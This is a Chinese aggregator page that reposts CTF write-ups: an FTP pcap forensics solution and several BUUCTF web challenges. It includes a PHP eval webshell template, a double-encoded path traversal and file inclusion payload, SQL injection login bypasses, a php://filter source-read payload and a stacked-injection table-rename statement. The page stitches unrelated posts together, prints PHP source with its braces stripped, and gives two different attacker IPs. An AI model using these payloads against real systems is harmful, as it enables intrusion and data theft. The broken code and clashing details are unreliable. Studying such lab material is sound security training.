服务器日志—wp—青少年CTF

Posted SRIGT

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了服务器日志—wp—青少年CTF相关的知识,希望对你有一定的参考价值。

  1. 使用 WireShark 打开日志文件 log.pcpng
  2. 获取恶意用户下载的文件
    1. 方法一:通过对 FTP-DATA 对象导出,可知下载了名为 flag 的文件,通过 save 可获取文件
    2. 方法二:通过过滤 FTP 发现恶意用户使用了 LIST、RETR 等指令,其中 RETR 指令用于让服务器克隆一份指定的文件,由此推出下载了 flag 文件,可以过滤 FTP-DATA 通过追踪 TCP 流导出文件内容
  3. 同时知道了恶意用户的地址为 10.10.1.131,可通过ip.src==10.10.1.128 && tcp.flags.ack方法进行过滤,在获取 flag 文件的位置附近可找到 php 一句话木马的目录与内容,其中,密码在木马中的位置为<?php @eval($_POST[\'密码\']);?>

-End-

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)

文章目录

[HCTF 2018]WarmUp


首先看看网页源码呗

 <?php
    highlight_file(__FILE__);
    class emmm
    
        public static function checkFile(&$page)
        
        	//定义了一个数组
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            // 判断,变量是否为空,是否不是字符串
            if (! isset($page) || !is_string($page)) 
                echo "you can't see it";
                return false;
            
			// 如果参数存在于数组中,返回true
            if (in_array($page, $whitelist)) 
                return true;
            
			// mb_substr是截取函数,从0到?
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            // 如果变量在数组中,返回true
            if (in_array($_page, $whitelist)) 
                return true;
            
			// 先进行url解码,然后截取字符,如果变量在数组中没返回true
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) 
                return true;
            
            echo "you can't see it";
            return false;
        
    

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) 
        include $_REQUEST['file'];
        exit;
     else 
        echo "<br><img src=\\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\\" />";
      
?> 

可以看到函数代码中有四个if语句
第一个if语句对变量进行检验,要求$page为字符串,否则返回false
第二个if语句判断$page是否存在于$whitelist数组中,存在则返回true
第三个if语句判断截取后的$page是否存在于$whitelist数组中,截取$page'?'前部分,存在则返回true
第四个if语句判断url解码并截取后的$page是否存在于$whitelist中,存在则返回true
若以上四个if语句均未返回值,则返回false
有三个if语句可以返回true,第二个语句直接判断$page,不可用
第三个语句截取'?'前部分,由于?被后部分被解析为get方式提交的参数,也不可利用
第四个if语句中,先进行url解码再截取,因此我们可以将?经过两次url编码,在服务器端提取参数时解码一次,checkFile函数中解码一次,仍会解码为'?',仍可通过第四个if语句校验。('?'两次编码值为'%253f',构造url:
所以我们的payload 就是
file=source.php?file=source.php%253f../../../../../ffffllllaaaagggg


成功拿到flag

[极客大挑战 2019]EasySQL


这种就是抓抓包了,发现有单引号报错

那就是典型的万能密码了

payload:/check.php?username=admin'%20or%201=1%23&password=123

[极客大挑战 2019]Havefun


先看网页源代码吧

试了试cat=dog居然解出flag了。可能是那种签到题吧

[ACTF2020 新生赛]Include


首先题目是include,所以会往文件包含去想

尝试使用php://filter伪协议
payload:?file=php://filter/read=convert.base64-encode/resource=flag.php


base64解码得

[强网杯 2019]随便注


看一眼源码

单引号报错,找到注入点

union select 进行测试

然后就想到了堆叠注入,别问我怎么知道的。我被深育杯第一个虐惨了!!!

好像也就ctftraining这一个有用呗

然后看看表

然后看看两张表的结构


那么可以猜测我们提交查询的窗口就是在这个表里查询数据的

  1. 那么查询语句很有可能是 : selsect id,data from words where id =

因为可以堆叠查询,这时候就想到了一个改名的方法,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1’ or 1=1#爆出表所有内容就可以查flag啦

1';rename words to words1;rename `1919810931114514` to words;alter table flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#

再用一下一开始的操作id=1’ or 1=1#


https://www.cnblogs.com/wjw-zm/p/12359735.html

[SUCTF 2019]EasySQL



感觉没有过滤

select都可以用

这道题目需要我们去对后端语句进行猜测

1、输入非零数字得到的回显1和输入其余字符得不到回显=>来判断出内部的查询语句可能存在有||

2、也就是select 输入的数据||内置的一个列名 from 表名=>即为

select post进去的数据||flag from Flag(含有数据的表名,通过堆叠注入可知)

此时的||起到的作用是or的作用

内置的sql语句为

sql=“select”.post[‘query’]."||flag from Flag";

如果$post[‘query’]的数据为*,1,sql语句就变成了

select *,1||flag from Flag

也就是

select *,1 from Flag

也就是直接查询出了Flag表中的所有内容

以上是关于服务器日志—wp—青少年CTF的主要内容,如果未能解决你的问题,请参考以下文章

[青少年CTF]Misc—Easy by 周末

青少年CTF_misc部分题解

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)

CTF 在线工具 wp 学长博客